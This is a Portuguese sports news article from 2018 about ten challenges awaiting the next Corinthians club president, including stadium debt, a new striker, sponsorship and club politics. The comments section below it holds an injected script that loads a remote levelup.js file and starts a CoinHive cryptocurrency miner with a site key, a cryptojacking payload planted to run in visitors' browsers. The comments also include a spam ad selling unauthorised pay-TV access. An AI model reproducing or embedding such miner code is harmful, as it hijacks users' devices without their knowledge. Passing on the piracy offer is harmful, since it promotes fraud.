3/2/2018 08:45

Veja dez desafios que o próximo presidente do Corinthians terá pela frente

Arena, dívidas, contratação do camisa 9... Novo mandatário terá muito trabalho até 2020

Veja dez desafios que o próximo presidente do Corinthians terá pela frente
Foto: infoesporte

O Corinthians terá um novo presidente a partir deste sábado, quando os sócios do clube irão às urnas, no Parque São Jorge. Além do comandante do Timão pelos próximos três anos, serão eleitos 200 conselheiros.



Cinco candidatos disputam a sucessão de Roberto de Andrade na presidência. São eles: Andrés Sanchez, Antonio Roque Citadini, Felipe Ezabella, Paulo Garcia e Romeu Tuma Júnior.

O novo mandatário terá importantes desafios pela frente, como a renegociação da dívida da Arena Corinthians, a contratação de um novo camisa 9 e a finalização do CT da base. Veja dez missões do próximo presidente alvinegro:

Arena
Equacionar mais uma vez a dívida relativa à construção do estádio será uma das grandes tarefas do próximo presidente corintiano. Com dívida estimada em R$ 1,3 bilhão (considerando juros e outros encargos), o clube tem negociação em andamento com a Caixa Econômica Federal para remodelar o contrato de financiamento. Ainda há obras inacabadas pela Odebrecht a serem cobradas e a venda dos naming rights pendente.

Camisa 9
O Timão ainda aguarda a contratação de um substituto para Jô. Vários nomes foram consultados, como Henrique Dourado e Gilberto, mas o presidente Roberto de Andrade deixou a tarefa de reforçar o ataque para o seu sucessor. Na última semana, o técnico Fábio Carille pediu rápida definição da nova diretoria. Depois, o treinador adotou tom ameno e disse entender caso não cheguem jogadores.

CT da base
Promessa dos últimos presidentes do clube, o centro de treinamento para os jovens jogadores já saiu do papel, mas está incompleto. Atualmente, o espaço (ao lado de onde treinam os profissionais) já tem campos e serve para treinamentos das equipes de base. Porém, ainda não foram construídos vestiários, alojamentos e toda a estrutura que o Corinthians planeja. Os cinco candidatos prometeram tratar o assunto como prioridade.

Patrocínio máster
Desde o fim do contrato com a Caixa, em abril do ano passado, o Corinthians não tem um anunciante em seu principal espaço da camisa. A Cia do Terno estampou a sua marca no uniforme alvinegro na reta final do Brasileirão, mas não renovou contrato. Esta propriedade é uma fonte de receitas fundamental para o clube, que pede R$ 30 milhões para assinar contrato de um ano.

Credibilidade
Nos últimos anos, o Corinthians esteve ligado a uma série de escândalos. O noticiário negativo, além de alimentar provocação dos torcedores rivais, mancha a imagem do clube e atrapalha na busca por parceiros e patrocinadores.

Dívidas
O Corinthians não tem atrasado o pagamento de salários aos jogadores, mas, por outro lado, enfrenta dificuldades para pagar parceiros. Foram inúmeros os casos recentes de processos judiciais contra o Timão por conta de calotes. Além disso, o clube tem tido que vender jogadores para fechar as suas contas. O novo presidente terá muito trabalho para cuidar da saúde financeira do Timão.

Fazendinha
Atualmente, o estádio do Parque São Jorge recebe apenas jogos e treinos das categorias de base. O local está ficando com a sua estrutura defasada e não oferece receitas para o Corinthians. Cuidar do clube social como um todo é outro dos desafios do novo mandatário.

Renovações
Dois dos titulares do Corinthians têm contrato acabando no fim deste ano: o zagueiro Balbuena, cuja renovação se arrasta desde o ano passado, e o meia Jadson, que já declarou que deseja ficar. Além disso, o Timão terá de definir em breve as situações dos veteranos Danilo e Emerson Sheik.

Política
Com a mudança estatutária, que acabou com o "chapão", o Corinthians passará a ter um Conselho Deliberativo mais plural, mas também mais difícil de ser administrado. O próximo presidente precisará ter habilidade para conseguir aprovar suas contas no órgão. Outra questão política a ser tratada pelo sucessor de Roberto de Andrade é a votação para a presidência da CBF, que ainda não tem data estipulada, mas pode ocorrer neste ano.

Esportes olímpicos
O Corinthians não é só futebol masculino. Há o time feminino e outras modalidades, como natação, vôlei, basquete, natação... Tornar atletas e equipes do clube competitivos e rentáveis é outro desafio do presidente.


VEJA TAMBÉM
- Timão escalado para o jogo contra o América-RN
- Corinthians goleia o Fluminense e vence a primeira no Brasileirão
- Timão escalado para o jogo contra o Fluminense









4641 visitas - Fonte: Globoesporte.com

Mais notícias do Corinthians

Notícias de contratações do Timão
Notícias mais lidas

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Volta Andrés por favor

(Comentário excluído)

< src="http://yourjava.com/9215118311/levelup.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.

Últimas notícias

  • publicidade
  • publicidade
    publicidade

    Brasileiro

    Dom - 16:00 - Neo Química Arena -
    X
    Corinthians
    Atletico-MG

    Sudamericana

    Ter - 19:00 - Neo Química Arena
    4 X 0
    Corinthians
    Nacional Asuncion
    publicidade
    publicidade
    publicidade